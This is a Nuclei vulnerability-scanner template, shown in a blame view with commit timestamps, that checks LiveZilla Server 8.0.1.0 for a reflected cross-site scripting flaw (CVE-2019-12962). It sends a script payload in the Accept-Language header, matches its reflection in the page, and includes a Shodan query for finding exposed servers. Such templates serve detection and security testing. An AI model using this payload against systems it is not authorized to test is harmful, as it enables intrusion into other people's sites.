nuclei-templates/cves/2019/CVE-2019-12962.yaml

46 lines
1008 B
YAML
Raw Normal View History

2022-05-08 14:45:08 +00:00
id: CVE-2019-12962
info:
2022-05-09 07:11:38 +00:00
name: LiveZilla Server 8.0.1.0 - Cross Site Scripting
2022-05-08 14:45:08 +00:00
author: Clment Cruchet
severity: medium
2022-05-09 07:11:38 +00:00
description: |
LiveZilla Server 8.0.1.0 - Accept-Language Reflected XSS
reference:
- https://www.exploit-db.com/exploits/49669
- https://nvd.nist.gov/vuln/detail/CVE-2019-12962
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2019-12962
cwe-id: CWE-79
2022-05-09 09:43:18 +00:00
metadata:
verified: true
shodan-query: http.html:LiveZilla
tags: cve,cve2019,livezilla,xss
2022-05-08 14:45:08 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/mobile/index.php'
2022-05-09 07:11:38 +00:00
headers:
Accept-Language: ';alert(document.domain)//'
2022-05-09 09:43:18 +00:00
2022-05-08 14:45:08 +00:00
matchers-condition: and
matchers:
- type: word
part: body
2022-05-09 07:11:38 +00:00
words:
- "var detectedLanguage = ';alert(document.domain)//';"
2022-05-08 14:45:08 +00:00
- type: word
2022-05-09 07:11:38 +00:00
part: header
2022-05-08 14:45:08 +00:00
words:
- "text/html"
- type: status
status:
2022-05-08 14:52:43 +00:00
- 200